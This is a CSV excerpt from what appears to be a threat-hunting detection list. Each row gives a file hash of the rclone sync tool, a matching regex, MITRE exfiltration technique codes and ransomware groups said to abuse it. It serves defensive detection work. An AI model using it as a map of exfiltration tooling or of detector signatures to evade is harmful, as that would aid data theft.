"*6394fd312c4f2c53185734aa67af7bf30e68a586c58b09c3e72e71dde8919176*",".{0,1000}6394fd312c4f2c53185734aa67af7bf30e68a586c58b09c3e72e71dde8919176.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*63e95d8caa59cde784f3d41b11363ca017dfc5c7612196284310a5d9530e8d8f*",".{0,1000}63e95d8caa59cde784f3d41b11363ca017dfc5c7612196284310a5d9530e8d8f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*6417ce2a5997efaef09522d3a6f961e535857753700b66fdb351c2f8b75cdee5*",".{0,1000}6417ce2a5997efaef09522d3a6f961e535857753700b66fdb351c2f8b75cdee5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*643ea58cd70903f9569918c2ebd1da696b714fb42d98bb4a972f746fc1e586b0*",".{0,1000}643ea58cd70903f9569918c2ebd1da696b714fb42d98bb4a972f746fc1e586b0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*647b01731dc9debad04d365d4157ef666ca9804e73bec5438463f638fb71351b*",".{0,1000}647b01731dc9debad04d365d4157ef666ca9804e73bec5438463f638fb71351b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*6493890ba8faaac76aa5e27f95f9c69774e6ce89d7c2849e1532d950de5cad60*",".{0,1000}6493890ba8faaac76aa5e27f95f9c69774e6ce89d7c2849e1532d950de5cad60.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*6498c00b9c204284606c7dabe24845409c7d90e923cfb03731abe9813160339d*",".{0,1000}6498c00b9c204284606c7dabe24845409c7d90e923cfb03731abe9813160339d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*64b63a013561fd18af1e1ae42b5ba720223203730b4bf580b3f8814cda31fc1c*",".{0,1000}64b63a013561fd18af1e1ae42b5ba720223203730b4bf580b3f8814cda31fc1c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*64d07dc9f31487e91ebb3b16d1fbecc8c49e71c80e2fb89679e53ff194af7ac5*",".{0,1000}64d07dc9f31487e91ebb3b16d1fbecc8c49e71c80e2fb89679e53ff194af7ac5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*65673e9110f58e5f801f6c7256cb09307466f22e94645b0de36f510141d02be8*",".{0,1000}65673e9110f58e5f801f6c7256cb09307466f22e94645b0de36f510141d02be8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*657337a33b59dcee4cabdbcbb254ed988755adc36a8714539e76f838a88a0345*",".{0,1000}657337a33b59dcee4cabdbcbb254ed988755adc36a8714539e76f838a88a0345.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*65786b035dc5483efb08c767e482a57c2edb8993d11b2bf0d7b0ee68f3d23168*",".{0,1000}65786b035dc5483efb08c767e482a57c2edb8993d11b2bf0d7b0ee68f3d23168.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*658e2b74ab4ed141f1c0794f03e95efe8dc718bffaad44267d290987fc4ecd2c*",".{0,1000}658e2b74ab4ed141f1c0794f03e95efe8dc718bffaad44267d290987fc4ecd2c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*65a291b3d4e59783d3055262819f8aba9cada498e60b578dfe7321be68d45b10*",".{0,1000}65a291b3d4e59783d3055262819f8aba9cada498e60b578dfe7321be68d45b10.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*65b36a7d2b547af519016a6c77eb8870a629ffe740d05bb188817460d34ccae5*",".{0,1000}65b36a7d2b547af519016a6c77eb8870a629ffe740d05bb188817460d34ccae5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*65fb7e17d5786676540f52657cbbb54407ded73b48787d5946f140120db898f0*",".{0,1000}65fb7e17d5786676540f52657cbbb54407ded73b48787d5946f140120db898f0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*6626d67f60eb1fae7cf36b9c6c250e38810fd27878beb6350fadd09bc7110835*",".{0,1000}6626d67f60eb1fae7cf36b9c6c250e38810fd27878beb6350fadd09bc7110835.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*66378582dd58282341dc79f206813fbcfc215a21c0236ae5d162d08503ade743*",".{0,1000}66378582dd58282341dc79f206813fbcfc215a21c0236ae5d162d08503ade743.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*664c2927a15fcf39f6a87c135100c45d021ddbdb6277820507f92590458c3ac4*",".{0,1000}664c2927a15fcf39f6a87c135100c45d021ddbdb6277820507f92590458c3ac4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*66911ebca32cf181fc029455979e0be46b057cc0f7516c4cbabbf4fd6a5578f8*",".{0,1000}66911ebca32cf181fc029455979e0be46b057cc0f7516c4cbabbf4fd6a5578f8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*66ca083757fb22198309b73879831ed2b42309892394bf193ff95c75dff69c73*",".{0,1000}66ca083757fb22198309b73879831ed2b42309892394bf193ff95c75dff69c73.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*670e18960efd34bae9d1a0152a54f16ba0c6b8fad728d7ff4ea8b141ef1ed93d*",".{0,1000}670e18960efd34bae9d1a0152a54f16ba0c6b8fad728d7ff4ea8b141ef1ed93d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*671e11ba1db069358185dff58705ad2d6b244f16026541e48443fe4d5f3be747*",".{0,1000}671e11ba1db069358185dff58705ad2d6b244f16026541e48443fe4d5f3be747.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*67565a74ae8ccdcf388bf100bc96712ff579a4774e6a8feeaeb6357b8335277d*",".{0,1000}67565a74ae8ccdcf388bf100bc96712ff579a4774e6a8feeaeb6357b8335277d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*6765fae1d6833ddd5f57815c1925ee564b4ac3ced93a6bde383ad843d2e94000*",".{0,1000}6765fae1d6833ddd5f57815c1925ee564b4ac3ced93a6bde383ad843d2e94000.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*68248a96b04afe29d0e807c5c5adcf05c9c86a699080cbd69de2bef1e2d94140*",".{0,1000}68248a96b04afe29d0e807c5c5adcf05c9c86a699080cbd69de2bef1e2d94140.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*687a576ce0781327c1b94663364685e9d59f28359e3d6a60b2ed59cfccdf9c3e*",".{0,1000}687a576ce0781327c1b94663364685e9d59f28359e3d6a60b2ed59cfccdf9c3e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*68bc7bb6b8359d8e92afce33991d3f3a4f13f91420a30927a3246e7ee47958b8*",".{0,1000}68bc7bb6b8359d8e92afce33991d3f3a4f13f91420a30927a3246e7ee47958b8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*69163ce90631331f5df44f08f2cc5a32f851eea7dd25af4e881a4ab1e8de83c4*",".{0,1000}69163ce90631331f5df44f08f2cc5a32f851eea7dd25af4e881a4ab1e8de83c4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*691d5d6406e5a2eb28bac68053fde03bbb4c749647f0ea54f7f5b2b173ef2ae3*",".{0,1000}691d5d6406e5a2eb28bac68053fde03bbb4c749647f0ea54f7f5b2b173ef2ae3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*692af170382b823e32c575826762a222de1d34bf355f99858a80d8077c46bb86*",".{0,1000}692af170382b823e32c575826762a222de1d34bf355f99858a80d8077c46bb86.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*6932ff5ad4b81f5a8b7a04b58353d07e65be9ae7502922befee48a9b7056c8c8*",".{0,1000}6932ff5ad4b81f5a8b7a04b58353d07e65be9ae7502922befee48a9b7056c8c8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*694dc37c05dd6b897373b036c3c6f6845b6f962baffcaf20165822cf724fc4de*",".{0,1000}694dc37c05dd6b897373b036c3c6f6845b6f962baffcaf20165822cf724fc4de.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*6959843cd7199564fcca1fd32d727e25468d8d71a9526ebff9cbf0dd3a7cfedf*",".{0,1000}6959843cd7199564fcca1fd32d727e25468d8d71a9526ebff9cbf0dd3a7cfedf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*695cc49fc317d1c8180653884dd700bcb917ff4c881c66492f2eb62fabbaa37b*",".{0,1000}695cc49fc317d1c8180653884dd700bcb917ff4c881c66492f2eb62fabbaa37b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*698f1224df6146dd25de72204b2d5937b260abdf61496b90337926c78b92d29b*",".{0,1000}698f1224df6146dd25de72204b2d5937b260abdf61496b90337926c78b92d29b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
